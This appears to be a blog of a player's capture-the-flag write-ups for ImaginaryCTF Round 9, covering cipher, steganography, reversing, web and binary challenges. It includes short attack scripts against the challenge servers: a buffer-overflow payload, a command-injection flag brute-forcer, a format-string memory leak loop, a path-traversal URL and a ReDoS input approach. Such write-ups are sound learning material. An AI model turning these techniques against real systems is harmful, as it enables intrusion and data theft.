Max49's ICTF Round 9 Challenge Writeups

Solve:

So to solve this chall (which was a little harder since it was April Fool's Day), you first needed to download the file you're given and open it to see a youtube link. After getting RickRolled, you would see that the description contains a lot of whitespace. By either scrolling down a lot or "Ctrl + F"ing "ictf{", you would get the flag. The flag was later added to #faq like it always is.

Solve:

Solving this chall was pretty simple based on the information you're given. You're given a string with the hint of "Rotations" and "Caesar". From this information, you can tell that this is an ROT47 cipher because ROT13 doesn't affect special characters. By putting this string into CyberChef and putting the ROT47 cipher into the middle, we get the flag.

Solve:

Just based on the hints given in the chall, we can assume that this challenge will probably have something to do with salted hashes. By opening the python script, we see that if this were to be run, we would just be put into a "emulator" of our own system. The checkinput() function is where all the important information is in. By the first line of this function, we know that it's checking to see if the parameter is equal to a value, but we don't know what this value is by just looking at it. Since this is python, we can just open the python terminal and put the right side of this if statement into the terminal to get what we want.



This looks like a hash and we can easily tell what kind of hash it is based on the python script, and it's a SHA512 hash. The first thing I think of when seeing a hash is to put it into CrackStation. Putting this hash through returns "saltwater" and knowing that the hashed string was salt + inp, we know that inp is water. Moving on, we see another long encoded string similar to what we saw when we calculated the final hash. Putting this into python gives us a pastebin link. Going here prompts for a password and from the script, we know that the password is inp, which is "water". Putting "water" into this password box gives us the flag.

Solve:

                
from pwn import *

p = remote('stephencurry.ctfchallenge.ga',5000)

offset = b'A' * 12
payload = offset + p64(0x1337c0d3)

p.sendline(payload)

payload = b'A' * 36 + p64(0x4011b6)
p.sendline(payload)

p.interactive()  
                
              

Solve:

To solve this challenge, we download the image to see nothing. It just seems to be a black image with nothing in it. From what I know from past CTF competitions, CyberChef has a feature called "Randomize Colour Palette" which could help reveal hidden images and text in pictures. Putting this image into CyberChef and dragging in the "Randomize Colour Palette" block into the middle gives us an image with the flag written it in.

Intended Solve:

This was one of my challs! So the intended solve for this challenge was as follows:

So, on going to the link provided, you're presented a login screen with no info specifically stated. In the original sources-adventure in Round 8, the logins were stored in /logins.txt and that was figured out through inspecting the comments. When viewing the source of the page with Ctrl + U or equivalent, no comments are seen, but the source seems to go on for a while. By searching for the comment marker (<!--) with Ctrl+F or scrolling down, you'll see a conversation where it's mentioned that the file where the logins are stored can't be accessed by search engine crawlers anymore (alternatively, this conversation could've been found much easier in the developer tools). Anyone who has some experience in web ctf challs knows that this is referring to the robots.txt file and on going to this page, it's seen that the page /classified_info is disallowed. Going to this page gives us our login information (All of these do the exact same thing).

Now that we have access to the returning employee portal, we're greeted with javascript alert spam like last time. Attempting to deobfuscate this code as was the method of solving the last sources-adventure will be of no use. In the boss notification, it's stated that you will be replaced by rooYay2 with a link to his resume. Going here will show rooYay2's resume and the comments on this webpage say that his employee password will be his favorite emoji, which is rooNoBooli, as seen by hovering over his picture.

Logging into rooYay2:rooNoBooli brings up rooYay2's custom portal, with no real info that would point you anywhere specific. The comments just say that it's time for the sources adventure. A comment also stated on rooYay2's resume is to create a custom employee portal based around rooYay2's interests and it did say that cookies were his favorite snack. Inspecting the cookies with developer tools shows two cookies: adminID and adminPass. The values of these two cookies look like hex, but decoding these as hex returns nothing of use. Since it's not hex, the next thought is that it's a hash, as that's what it looks like. Putting these strings into CrackStation cracks the hashes and gives us the login panel:"991560128"licypz

Logging into the admin panel now gives us a new boss announcement stating that payroll information is located on the payroll page as usual. Going to /payroll gives us a download link to a json file with payroll information stored inside it. An employee ID is also stored with each employee and since the last employee's ID is "ictf", we can assume this is where the flag is, which is in the order from last user ID to first user ID. After putting all these ID's together, we get the flag.

Solve:

For this chall, we're given a file that contains what we know to be python bytecode. Given the description, we can look up dis python to get the documentation that matches the text we see in the file. Using this documentation, we can rewrite this bytecode in python to get the script that will give us our flag. Rewriting the code using the documentation gives us the code:

By rearranging our code a little bit to match this scenario, we still need a value to pass into the function that gives us the flag. The flag can be retrieved in one of two ways now. The first way is to ignore logic and just bruteforce numbers 1-300 until you get the flag. Alternatively, some logic can be applied and knowing that the first character has to be i (flag format is ictf{), you could find the number that when subtracted by 0 gives you 105, which is 105. Passing 105 into the function gives us our flag.

Intended Solve:

This was another one chall that I submitted this round. This one was a little more guessy than sources-adventure-hardended, but I thought it was pretty straightforward overall (and it's misc, of course it's gonna be guessy to some degree). So when you DM this bot with !help, you're given a list of all the commands the bot has. The first logical step after this is to do !info to learn a little more about what you're supposed to do and rsa is the only kind of info you're given. Doing !rsa gives you an rsa problem to solve where Public Key = (p)(q), e = e, and (c+6)/2 is the ciphertext plus 6 divided by 2. After multiplying the ciphertext by 2 and subtracting 6 to get the real ciphertext, this all can just go into RsaCtfTool to get the message, which is that this chall might be a steg (steganography) chall. Now that we've gotten !help, !info, and !rsa out of the way, we try the rest of the commands to see that !printflag returns the same output every time it's run and !checkflag literally only checks the flag, which you provide as input, so the only two commands left are !pfp and !imaginary.

!pfp functions as a normal pfp command (the original plan for this chall was to embed the flag in the bot's pfp but discord changes the image when you upload it) and poses the only part, I think, in this challenge where someone might get confused. !imaginary is the last command and returns a random output each time, with one of these being an image. With the hint of this being a steg chall, download this image and run some steg tools on it. The intended tool to use was stegseek as this file was hidden with steghide with a passphrase that's in rockyou. The flag was in the embedded txt file.

Solve:

So in this chall, we're given a nc server to connect to and some source code. Firstly, based off the title, by looking up "ReDOS", we see that this is a DOS attack where the regex takes too long to compute. By analyzing the source code a little bit, we see that we need to get the code to timeout in order to give us the flag. To get the code to return TimeoutError, we see that we need to get validateEmail(email) to timeout for 10 seconds, and this function just checks input against a regex. We also see that validateEmail(email) is only called in the createAcc() function and this function is only called when we access the "Create Account" input from the menu we're greeted with.

So basically, to sum it up, we need to make the email input time out when we create an account

By entering the regex into regex101, we can analyze the regex to see what it's looking for. To simplify it, the regex is looking for:

So examples of string that match this regex include:

When entering test strings into regex101, we can see how long it takes for the regex to compute:

and since we know that this is a ReDOS attack and we need to timeout the regex, we should be looking at this number during our testing.

From here, there are two ways of finding an email that times out the regex. The first way (the way I originally solved it) was just spamming gmail a bunch of times until the time turned into "catastrophic backtracking"

An alternative (and much better) way of getting a string was seeing that after typing a certain amount of "gmail"s, typing any other character would also return "catastrophic backtracking"

Inputting any of these strings that return "catastrophic backtracking" when the program prompts the creation of an account will cause the program to timeout and will display the flag.

Solve:

My solve script:

                
                  
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA512

class RSA:
  n = [long number redacted]
  e = 65537
  d = [long number redacted]
  def _decrypt(self, ciphertext):
    return pow(ciphertext, self.d, self.n) 

ciphertext = bytes.fromhex("[long string redacted]")
key = RSA()
cipher = PKCS1_OAEP.new(key, hashAlgo=SHA512)
message = cipher.decrypt(ciphertext) 
print(message)
                
              

Solve:

                
                  
from pwn import *  
import string

p = remote('oreos.ctfchallenge.ga',12345) 
chars = list(string.printable)
command = "grep -F "
flag = "ictf{"
chars.remove('\n')
while True:
for char in chars:
    p.recvuntil(b'>>> ')
    p.sendline(command + "\'" + flag + char + "\' flag.txt" )
    if(p.recvline() == b'SUCCESS\n'):
      flag += char
      if(char == "}"):
        print(flag)
        break
      else:
        continue
  if(flag[-1] == "}"):
    break
                
              

Solve:

This chall was a nice and easy one. We know the flag is in flag.txt and Eth007 gave the hint that it's very similar to "Pathological Liars", a challenge from the previous round. The solve for that chall was to go to the directory ../flag.txt, and doing something similar on this link gives us the flag. (The solve link is http://lookforit.epizy.com/?page=../flag.txt)

Solve:

So for this chall, we're just given a string from which we have to find the flag. The only hint we're given is that this challenge is solved with rotations. We can put this string into CyberChef and see what we can do. Since this string isn't the right length to be any kind of common hash, let's just hex decode it to see what we can do. Hex decoding this gives us something that doesn't look exactly right, but it does start with an i, so we can attempt to work with this for now.

With the hint of rotations, we can try ROT13 or ROT47, but neither of those will give us the flag.

Solve:

coming soon, I forgot to make a writeup for this one give me a little bit.

Solve:

This was a cool python reversing challenge. So when running this program as it was originally made, the only output printed is "ictf" until the program hangs. In analyzing what's taking place when this program is run, it can be seen that the part that makes the program hang is that part that checks if the number is prime. If we edit the program to print the numbers being tested before they enter the function, we see that the program hangs because the numbers get too large. We know that pycryptodome, more specifically Crypto.Util.number, has a function that checks if a number is prime and provides a True/False output like the current code does, so if we replace

with

and run the program now, we see that we immediately get many more characters in the flag, but after a certain point, the program hangs again. In this case though, we know the program is working because it's slowly printing the output (this will get much slower over time)

Now we can see "ictf{l00kup_w00dal" after waiting about five minutes. Knowing that we're working with prime numbers, we lookup "woodall primes" and are given a Wikipedia article about them. From the beginning of the article, we see that a Woodall number is caculated by the equation W = (n • 2**n) - 1, which is exactly what's happening in the sequence() function. Now that we know that a character will only print when n returns a Woodall prime, we can go to this website to see some values of n that would give us a Woodall prime number. Adding the list:

at the beginning of the code and changing the end of the code to:

and then running the program again will print out our flag instantly

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

This was a fun forensics chall to work on. So after unzipping the .rar file from the link, we get an image and a text file. With the description, it can be inferred that we need a passphrase for the image and that the passphrase has something to do with the text file.

Based on past ctf challs, it's known that files can be embedded in images with steghide. Running stegseek (a tool that runs through all rockyou phrases on the image) does not work, so we'll have to find the passphrase elsewhere. The description mentions that "It's almost as if the text file is my key." which brings us back to to the text file.

When running the command "steghide extract -sf ictf.jpg" (I renamed the image) and entering the entire text file as a passphrase, no data is able to be extracted, so possibly the passphrase is hidden in the text file instead. When I pasted the text file into my terminal, I noticed characters like "\u200b", "\u200c", and "\u200d" showing up throughout the text even though I couldn't see them in the plain text file. By looking up these unicode characters, it's seen that there are called Zero Width characters (whitespace) and are usually invisible.

A popular tool for encoding and decoding whitespace steganography is offdev.net, but putting the text into this gives us nothing. If we search for an alternative tool, this one looks promising. If we copy and paste the text file into the Steganography Text box and press decode, we get something that doesn't look exactly right.



If we scroll down to the bottom of the page, we see that not all the characters we saw earlier are checked. Checking all of the boxes and running the decode again gives us a much better looking passphrase, "thisisthepasswordforthefilebutinzwspglhf".

Running "steghide extract -sf ictf.jpg" again and entering this new passphrase extracts a file named "quack.zlib", a compressed data archive. Looking up how to extract data from a zlib file brings us to the command "zlib-flate -uncompress < IN_FILE > OUT_FILE" and running this on the zlib file gives us an image with the flag written in it.

Solve:

With the hint given in the title, "Little", we can figure out that this is referring to the endianness (which is described as little or big) of the string. Putting this string into CyberChef and swapping the endianness (with raw data format) gives us our flag.

Alternatively, you could've noticed the pattern that if you read every 4 characters backwards, you would also get the flag

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

The exploit in this challenge it that fprintf() causes a memory leak that can get you the flag.

To solve this challenge, I first ran this script:

              
from pwn import *  

p = remote('34.203.197.39',3000) 

for i in range(101):
	p.recv()	
	p.sendline("%" + str(i) + "$p")
              
            

to see if I could spot any significant points in the memory. After running this with LogLevel on DEBUG, I saw a group of strings that looked like they could mean something:

Decoding this first hex in CyberChef gives us "r0f{ftci", which looks like a distorted version of the flag format. Swapping the endianness with the default word length gives us "{f0rictf", which is closer, but changing the word length to 8 gives us "ictf{f0r", which looks much better. Copy and pasting the next 4 strings into this CyberChef recipe and combining all of these fragments in order gives us the flag.

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

Unsolved  

Solve:

This was a nice easy challenge to end the round off. So the only attachment you're given is a string and the hint of "ropsten". Looking up "ropsten" and clicking the second link down (first link is useless) brings us to this page which looks promising. Entering the string we're given into the search box brings up a page with some transactions, meaning we might be in the right place. Looking at "more info", we see a creator tag with another address. After looking more on this original page, we see that we can't find anything, so if we go to the creator's address page, we see a lot more we can work with.

Exploring this page, we see a few recent transactions. Clicking on the most recent one brings us to a page with some more info about the transaction. Scrolling down and clicking "Click to see more" gives us an "Input Data" box. Changing "View Input As" to UTF-8, shows the string "Invalid Solution". If we do the same thing on the second most recent transaction and go to the "View Input As" box, we see the flag.